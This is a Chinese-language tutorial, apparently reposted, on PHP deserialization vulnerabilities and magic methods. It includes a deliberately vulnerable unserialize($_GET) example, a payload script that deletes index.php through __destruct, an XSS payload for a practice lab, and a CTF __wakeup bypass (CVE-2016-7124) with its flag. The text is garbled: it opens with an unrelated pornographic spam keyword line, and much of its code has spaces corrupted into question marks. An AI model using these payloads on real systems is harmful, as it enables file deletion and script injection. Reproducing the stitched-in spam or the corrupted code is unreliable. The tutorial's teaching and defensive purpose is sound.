337p日本欧洲亚洲大胆色噜噜,丰满的少妇邻居中文bd

<?php
class TestClass //定義一個(gè)類
{
//一個(gè)變量
public $variable = &#39;This is a string&#39;;
//一個(gè)方法
public function PrintVariable()
{
echo $this->variable;
}
}
//創(chuàng)建一個(gè)對象
$object?=?new?TestClass();
//調(diào)用一個(gè)方法
$object->PrintVariable();
?>

public、protected、private

PHP 對屬性或方法的存取控制，是透過在前面新增關(guān)鍵字 public（公有），protected（受保護(hù)）或private（私有）來實(shí)現(xiàn)的。

public（公有）：公有的類別成員可以在任何地方被存取。

protected（受保護(hù)）：受保護(hù)的類別成員則可以被自己以及其子類別和父類別存取。

private（私有）：私有的類別成員則只能被其定義所在的類別存取。

注意：存取控制修飾符不同，序列化後屬性的長度和屬性值會(huì)有所不同，如下所示：

public：屬性被序列化的時(shí)候?qū)傩灾禃?huì)變成屬性名稱

protected：屬性被序列化的時(shí)候?qū)傩灾禃?huì)變成\x00*\x00屬性名稱

private：屬性被序列化的時(shí)候?qū)傩灾禃?huì)變成\x00類別名稱\x00屬性名稱

其中：\x00##表示#空字元，但還是佔(zhàn)用一個(gè)字元位置（空格），如下例

<?phpclass People{
    public $id;
    protected $gender;
    private $age;
    public function __construct(){
        $this->id?=?'Hardworking666';
????????$this->gender?=?'male';
????????$this->age?=?'18';
????}}$a?=?new?People();echo?serialize($a);?>

O:6:"People":3:{s:2:"id";s:14:"Hardworking666";s:9:"?*?gender";s:4:"male";s:11:"?People?age";s:2:"18";}

魔術(shù)方法（magic函數(shù)）

PHP中把以

兩個(gè)底線 __開頭的方法稱為魔術(shù)方法(Magic methods)

PHP官方－魔術(shù)方法

PHP中16 個(gè)魔術(shù)方法詳解

#類別可能會(huì)包含一些特殊的函數(shù)：magic函數(shù)，這些函數(shù)在某些情況下會(huì)

自動(dòng)呼叫。

__construct()????????????//類的構(gòu)造函數(shù)，創(chuàng)建對象時(shí)觸發(fā)

__destruct()?????????????//類的析構(gòu)函數(shù)，對象被銷毀時(shí)觸發(fā)

__call()?????????????????//在對象上下文中調(diào)用不可訪問的方法時(shí)觸發(fā)

__callStatic()???????????//在靜態(tài)上下文中調(diào)用不可訪問的方法時(shí)觸發(fā)

__get()??????????????????//讀取不可訪問屬性的值時(shí)，這里的不可訪問包含私有屬性或未定義

__set()??????????????????//在給不可訪問屬性賦值時(shí)觸發(fā)

__isset()????????????????//當(dāng)對不可訪問屬性調(diào)用?isset()?或?empty()?時(shí)觸發(fā)

__unset()????????????????//在不可訪問的屬性上使用unset()時(shí)觸發(fā)

__invoke()???????????????//當(dāng)嘗試以調(diào)用函數(shù)的方式調(diào)用一個(gè)對象時(shí)觸發(fā)

__sleep()????????????????//執(zhí)行serialize()時(shí)，先會(huì)調(diào)用這個(gè)方法

__wakeup()???????????????//執(zhí)行unserialize()時(shí)，先會(huì)調(diào)用這個(gè)方法

__toString()?????????????//當(dāng)反序列化后的對象被輸出在模板中的時(shí)候（轉(zhuǎn)換成字符串的時(shí)候）自動(dòng)調(diào)用

serialize() 函數(shù)會(huì)檢查類別中是否存在一個(gè)魔術(shù)方法。如果存在，該方法會(huì)先被調(diào)用，然後再執(zhí)行序列化操作。

我們需要專注於5個(gè)魔術(shù)方法，所以再強(qiáng)調(diào)一下：

__construct：建構(gòu)函數(shù)，當(dāng)一個(gè)物件建立時(shí)調(diào)用

__destruct：析構(gòu)函數(shù)，當(dāng)一個(gè)物件被銷毀時(shí)呼叫

__toString：當(dāng)一個(gè)物件被當(dāng)作一個(gè)字串時(shí)使用

__sleep：在物件序列化的時(shí)候呼叫

##__wakeup

：物件重新醒來，也就是由二進(jìn)位字串重新組成一個(gè)物件的時(shí)候（當(dāng)物件被反序列化時(shí)呼叫）從序列化到反序列化這幾個(gè)函數(shù)的執(zhí)行過程是：

__construct()

->__sleep() -> __wakeup() -> __toString() -> __destruct()<pre class="brush:php;toolbar:false"><?php class TestClass { //一個(gè)變量 public $variable = &#39;This is a string&#39;; //一個(gè)方法 public function PrintVariable() { echo $this->variable.' '; ????} ????//構(gòu)造函數(shù) ????public?function??__construct() ????{ ????????echo?'__construct '; ????} ????//析構(gòu)函數(shù) ????public?function?__destruct() ????{ ????????echo?'__destruct '; ????} ????//當(dāng)對象被當(dāng)作一個(gè)字符串 ????public?function?__toString() ????{ ????????return?'__toString '; ????} } //創(chuàng)建一個(gè)對象 //__construct會(huì)被調(diào)用 $object?=?new?TestClass(); //創(chuàng)建一個(gè)方法 //‘This?is?a?string’將會(huì)被輸出 $object->PrintVariable(); //對象被當(dāng)作一個(gè)字符串 //toString會(huì)被調(diào)用 echo?$object; //php腳本要結(jié)束時(shí)，__destruct會(huì)被調(diào)用 ?></pre>輸出結(jié)果：

__construct
This?is?a?string
__toString
__destruct

__toString()

這個(gè)魔術(shù)方法能觸發(fā)的因素太多，所以有必要列一下：<pre class="brush:php;toolbar:false">1.??echo($obj)/print($obj)打印時(shí)會(huì)觸發(fā)? 2.??反序列化對象與字符串連接時(shí)? 3.??反序列化對象參與格式化字符串時(shí)? 4.??反序列化對象與字符串進(jìn)行==比較時(shí)（PHP進(jìn)行==比較的時(shí)候會(huì)轉(zhuǎn)換參數(shù)類型）? 5.??反序列化對象參與格式化SQL語句，綁定參數(shù)時(shí)? 6.??反序列化對象在經(jīng)過php字符串處理函數(shù)，如strlen()、strops()、strcmp()、addslashes()等? 7.??在in_array()方法中，第一個(gè)參數(shù)時(shí)反序列化對象，第二個(gè)參數(shù)的數(shù)組中有__toString()返回的字符串的時(shí)候__toString()會(huì)被調(diào)用? 8.??反序列化的對象作為class_exists()的參數(shù)的時(shí)候</pre>魔術(shù)方法在反序列化攻擊中的作用

反序列化的入口在

unserialize()

，只要參數(shù)可控制且這個(gè)類別在目前作用域存在，就能傳入任何已經(jīng)序列化的對象，而不是侷限於出現(xiàn)unserialize()函數(shù)的類別的物件。如果只能局限於當(dāng)前類，那麼攻擊面就太小了，而且反序列化其他類對像只能控制屬性，如果沒有完成反序列化後的代碼中調(diào)用其他類對象的方法，還是無法利用漏洞進(jìn)行攻擊。

但是，利用魔術(shù)方法就可以擴(kuò)大攻擊面，魔術(shù)方法是在該類別序列化或反序列化的同時(shí)自動(dòng)完成的，這樣就可以

利用反序列化中的物件屬性來操控一些能利用的函數(shù)

，達(dá)到攻擊的目的。透過下例理解魔術(shù)方法在反序列漏洞中的作用，程式碼如下：

二、PHP序列化和反序列化

PHP序列化

有時(shí)需要把一個(gè)物件在網(wǎng)路上傳輸，為了方便傳輸，可以

把整個(gè)物件轉(zhuǎn)化為二進(jìn)位字串

，等到達(dá)另一端時(shí)，再還原為原來的對象，這個(gè)過程稱之為串列化(也叫序列化)。

json數(shù)據(jù)使用 , 分隔開，數(shù)據(jù)內(nèi)使用 : 分隔鍵和值

json數(shù)據(jù)其實(shí)就是個(gè)數(shù)組，這樣做的目的也是為了方便在前后端傳輸數(shù)據(jù)，后端接受到j(luò)son數(shù)據(jù)，可以通過json_decode()得到原數(shù)據(jù)，
這種將原本的數(shù)據(jù)通過某種手段進(jìn)行"壓縮"，并且按照一定的格式存儲(chǔ)的過程就可以稱之為序列化。

有兩種情況必須把對象序列化：
把一個(gè)對象在網(wǎng)絡(luò)中傳輸
把對象寫入文件或數(shù)據(jù)庫

相關(guān)概念可以參考我以前的文章：
Python序列化與反序列化詳解（包括json和json模塊詳解）

PHP序列化：把對象轉(zhuǎn)化為二進(jìn)制的字符串，使用serialize()函數(shù)
PHP反序列化：把對象轉(zhuǎn)化的二進(jìn)制字符串再轉(zhuǎn)化為對象，使用unserialize()函數(shù)

通過例子來看PHP序列化后的格式：

<?php class User { //類的數(shù)據(jù) public $age = 0; public $name = ''; //輸出數(shù)據(jù) public function printdata() { echo 'User '.$this->name.'?is?'.$this->age.'?years?old. '; ????}?//?“.”表示字符串連接 } //創(chuàng)建一個(gè)對象 $usr?=?new?User(); //設(shè)置數(shù)據(jù) $usr->age?=?18; $usr->name?=?'Hardworking666'; //輸出數(shù)據(jù) $usr->printdata(); //輸出序列化后的數(shù)據(jù) echo?serialize($usr) ?>

輸出結(jié)果：

User?Hardworking666?is?18?years?old. O:4:"User":2:{s:3:"age";i:18;s:4:"name";s:14:"Hardworking666";}

下面的 O:4:"User":2:{s:3:"age";i:18;s:4:"name";s:14:"Hardworking666";} 就是對象user序列化后的形式。

“O”表示對象，“4”表示對象名長度為4，“User”為對象名，“2”表示有2個(gè)參數(shù)。

“{}”里面是參數(shù)的key和value，

“s”表示string對象，“3”表示長度，“age”則為key；“i”是interger（整數(shù)）對象，“18”是value，后面同理。

序列化格式：

a?-?array?數(shù)組型 b?-?boolean?布爾型 d?-?double?浮點(diǎn)型 i?-?integer?整數(shù)型 o?-?common?object?共同對象 r?-?objec?reference?對象引用 s?-?non-escaped?binary?string?非轉(zhuǎn)義的二進(jìn)制字符串 S?-?escaped?binary?string?轉(zhuǎn)義的二進(jìn)制字符串 C?-?custom?object?自定義對象 O?-?class?對象 N?-?null?空 R?-?pointer?reference?指針引用 U?-?unicode?string?Unicode?編碼的字符串

PHP序列化需注意以下幾點(diǎn)：

1、序列化只序列屬性，不序列方法
2、因?yàn)樾蛄谢恍蛄蟹椒ǎ苑葱蛄谢笕绻胝Ｊ褂眠@個(gè)對象的話我們必須要依托這個(gè)類要在當(dāng)前作用域存在的條件
3、我們能控制的只有類的屬性，攻擊就是尋找合適能被控制的屬性，利用作用域本身存在的方法，基于屬性發(fā)動(dòng)攻擊

PHP反序列化

對上例進(jìn)行反序列化：

<?php class User { //類的數(shù)據(jù) public $age = 0; public $name = ''; //輸出數(shù)據(jù) public function printdata() { echo 'User '.$this->name.'?is?'.$this->age.'?years?old. '; ????} } //重建對象 $usr?=?unserialize('O:4:"User":2:{s:3:"age";i:18;s:4:"name";s:14:"Hardworking666";}'); //輸出數(shù)據(jù) $usr->printdata(); ?>

User?Hardworking666?is?18?years?old.

_sleep 方法在一個(gè)對象被序列化時(shí)調(diào)用，_wakeup方法在一個(gè)對象被反序列化時(shí)調(diào)用

<?phpclass test{ public $variable = '變量反序列化后都要銷毀'; //公共變量 public $variable2 = 'OTHER'; public function printvariable() { echo $this->variable.' '; ????} ????public?function?__construct() ????{ ????????echo?'__construct'.' '; ????} ????public?function?__destruct() ????{ ????????echo?'__destruct'.' '; ????} ????public?function?__wakeup() ????{ ????????echo?'__wakeup'.' '; ????} ????public?function?__sleep() ????{ ????????echo?'__sleep'.' '; ????????return?array('variable','variable2'); ????}}//創(chuàng)建一個(gè)對象，回調(diào)用__construct$object?=?new?test(); ????//序列化一個(gè)對象，會(huì)調(diào)用__sleep$serialized?=?serialize($object); ????//輸出序列化后的字符串print?'Serialized:'.$serialized.' '; ????//重建對象，會(huì)調(diào)用__wakeup$object2?=?unserialize($serialized); ????//調(diào)用printvariable,會(huì)輸出數(shù)據(jù)(變量反序列化后都要銷毀)$object2->printvariable(); ????//腳本結(jié)束，會(huì)調(diào)用__destruct?>

__construct __sleep Serialized:O:4:"test":2:{s:8:"variable";s:33:"變量反序列化后都要銷毀";s:9:"variable2";s:5:"OTHER";}__wakeup 變量反序列化后都要銷毀 __destruct __destruct

從序列化到反序列化這幾個(gè)函數(shù)的執(zhí)行過程是：
__construct() ->__sleep -> __wakeup() -> __toString() -> __destruct()

PHP為何要序列化和反序列化

PHP的序列化與反序列化其實(shí)是為了解決一個(gè)問題：PHP對象傳遞問題

PHP對象是存放在內(nèi)存的堆空間段上的，PHP文件在執(zhí)行結(jié)束的時(shí)候會(huì)將對象銷毀。

如果剛好要用到銷毀的對象，難道還要再寫一遍代碼？所以為了解決這個(gè)問題就有了PHP的序列化和反序列化

從上文可以發(fā)現(xiàn)，我們可以把一個(gè)實(shí)例化的對象長久的存儲(chǔ)在計(jì)算機(jī)磁盤上，需要調(diào)用的時(shí)候只需反序列化出來即可使用。

三、PHP反序列化漏洞原理

序列化和反序列化本身沒有問題，

但是反序列化內(nèi)容用戶可控，

且后臺(tái)不正當(dāng)?shù)氖褂昧薖HP中的魔法函數(shù)，就會(huì)導(dǎo)致安全問題。

當(dāng)傳給unserialize()的參數(shù)可控時(shí)，可以通過傳入一個(gè)精心構(gòu)造的序列化字符串，從而控制對象內(nèi)部的變量甚至是函數(shù)。

調(diào)用__destruct刪除

存在漏洞的思路：一個(gè)類用于臨時(shí)將日志儲(chǔ)存進(jìn)某個(gè)文件，當(dāng)__destruct被調(diào)用時(shí)，日志文件將會(huì)被刪除：

//logdata.php<?phpclass?logfile{ ????//log文件名 ????public?$filename?=?'error.log'; ????//一些用于儲(chǔ)存日志的代碼 ????public?function?logdata($text) ????{ ????????echo?'log?data:'.$text.' '; ????????file_put_contents($this->filename,$text,FILE_APPEND); ????} ????//destrcuctor?刪除日志文件 ????public?function?__destruct() ????{ ????????echo?'__destruct?deletes?'.$this->filename.'file. '; ????????unlink(dirname(__FILE__).'/'.$this->filename); ????}}?>

調(diào)用這個(gè)類：

<?phpinclude 'logdata.php'class User{ //類數(shù)據(jù) public $age = 0; public $name = ''; //輸出數(shù)據(jù) public function printdata() { echo 'User '.$this->name.'?is'.$this->age.'?years?old. '; ????}}//重建數(shù)據(jù)$usr?=?unserialize($_GET['usr_serialized']);?>

代碼$usr = unserialize($_GET['usr_serialized']);中的$_GET[‘usr_serialized’]是可控的，那么可以構(gòu)造輸入，刪除任意文件。

如構(gòu)造輸入刪除目錄下的index.php文件：

<?php include 'logdata.php'; $object = new logfile(); $object->filename?=?'index.php'; echo?serialize($object).' '; ?>

上面展示了由于輸入可控造成的__destruct函數(shù)刪除任意文件，其實(shí)問題也可能存在于__wakeup、__sleep、__toString等其他magic函數(shù)。

比如，某用戶類定義了一個(gè)__toString，為了讓應(yīng)用程序能夠?qū)㈩愖鳛橐粋€(gè)字符串輸出（echo $object），而且其他類也可能定義了一個(gè)類允許__toString讀取某個(gè)文件。

XSS（跨站腳本攻擊）攻擊

XSS攻擊通常指的是通過利用網(wǎng)頁開發(fā)時(shí)留下的漏洞，通過巧妙的方法注入惡意指令代碼到網(wǎng)頁，使用戶加載并執(zhí)行攻擊者惡意制造的網(wǎng)頁程序。攻擊成功后，攻擊者可能得到包括但不限于更高的權(quán)限（如執(zhí)行一些操作）、私密網(wǎng)頁內(nèi)容、會(huì)話和cookie等各種內(nèi)容。

例如，皮卡丘靶場PHP反序列化漏洞

$html="; if(isset($_POST['o'])){????$s?=?$_POST['o']; ????if(!@$unser?=?unserialize($s)){????????$html.="錯(cuò)誤輸出"; ????}else{????????$html.="{$unser->test)"; ????}

為了執(zhí)行<script>alert('xss')</script>，Payload:

O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>";}

其他知識(shí)點(diǎn)：

unserialize漏洞依賴條件：
1、unserialize函數(shù)的參數(shù)可控
2、腳本中存在一個(gè)構(gòu)造函數(shù)（__construct()）、析構(gòu)函數(shù)（__destruct()）、__wakeup()函數(shù)中有向PHP文件中寫數(shù)據(jù)的操作類
3、所寫的內(nèi)容需要有對象中的成員變量的值

防范方法：
1、嚴(yán)格控制unserialize函數(shù)的參數(shù)，堅(jiān)持用戶所輸入的信息都是不可靠的原則
2、對于unserialize后的變量內(nèi)容進(jìn)行檢查，以確定內(nèi)容沒有被污染

四、實(shí)例

PHP反序列化繞過__wakeup() CTF例題

攻防世界xctf web unserialize3

打開網(wǎng)址后的代碼：

class?xctf{public?$flag?=?'111';public?function?__wakeup(){exit('bad?requests');}?code=

已知在使用 unserialize() 反序列化時(shí)會(huì)先調(diào)用 __wakeup()函數(shù)，

而本題的關(guān)鍵就是如何繞過 __wakeup()函數(shù)，就是 在反序列化的時(shí)候不調(diào)用它

當(dāng) 序列化的字符串中的屬性值個(gè)數(shù) 大于 屬性個(gè)數(shù) 就會(huì)導(dǎo)致反序列化異常，從而繞過 __wakeup()

代碼中的__wakeup()方法如果使用就是和unserialize()反序列化函數(shù)結(jié)合使用的
這里沒有特別對哪個(gè)字符串序列化，所以把xctf類實(shí)例化后，進(jìn)行反序列化。

我們利用php中的new運(yùn)算符，實(shí)例化類xctf。

new 是申請空間的操作符，一般用于類。
比如定義了一個(gè) class a{public i=0;}
$c = new a(); 相當(dāng)于定義了一個(gè)基于a類的對象，這時(shí)候 $c->i 就是0

構(gòu)造序列化的代碼在編輯器內(nèi)執(zhí)行：

<?php class xctf{ public $flag = '111'; //public定義flag變量公開可見 public function __wakeup(){ exit('bad requests'); } }//題目少了一個(gè)}，這里補(bǔ)上 $a=new xctf(); echo(serialize($a)); ?>

運(yùn)行結(jié)果

O:4:"xctf":1:{s:4:"flag";s:3:"111";}

序列化返回的字符串格式：

O:<length>:"<class name>":<n>:{<field name 1><field value 1>...<field name n><field value n>}

O:表示序列化的是對象
<length>:表示序列化的類名稱長度
<class name>：表示序列化的類的名稱
<n>:表示被序列化的對象的屬性個(gè)數(shù)
<field name 1>：屬性名
<field value 1>：屬性值

所以要修改屬性值<n>，既把1改為2以上。

O:4:"xctf":2:{s:4:"flag";s:3:"111";}

在url中輸入：

?code=O:4:"xctf":2:{s:4:"flag";s:3:"111";}

得到flag：cyberpeace{d0e4287c414858ea80e166dbdb75519e}

漏洞：
__wakeup繞過(CVE-2016-7124)
CVE-2016-7124：當(dāng)序列化字符串中表示對象屬性個(gè)數(shù)的值大于真實(shí)的屬性個(gè)數(shù)時(shí)會(huì)跳過__wakeup的執(zhí)行

官方給出的影響版本：
PHP5 < 5.6.25
PHP7 < 7.0.10

推薦學(xué)習(xí)：《PHP教程》

以上是詳細(xì)解析PHP反序列化漏洞的詳細(xì)內(nèi)容。更多資訊請關(guān)注PHP中文網(wǎng)其他相關(guān)文章！

本網(wǎng)站聲明

本文內(nèi)容由網(wǎng)友自願(yuàn)投稿，版權(quán)歸原作者所有。本站不承擔(dān)相應(yīng)的法律責(zé)任。如發(fā)現(xiàn)涉嫌抄襲或侵權(quán)的內(nèi)容，請聯(lián)絡(luò)admin@php.cn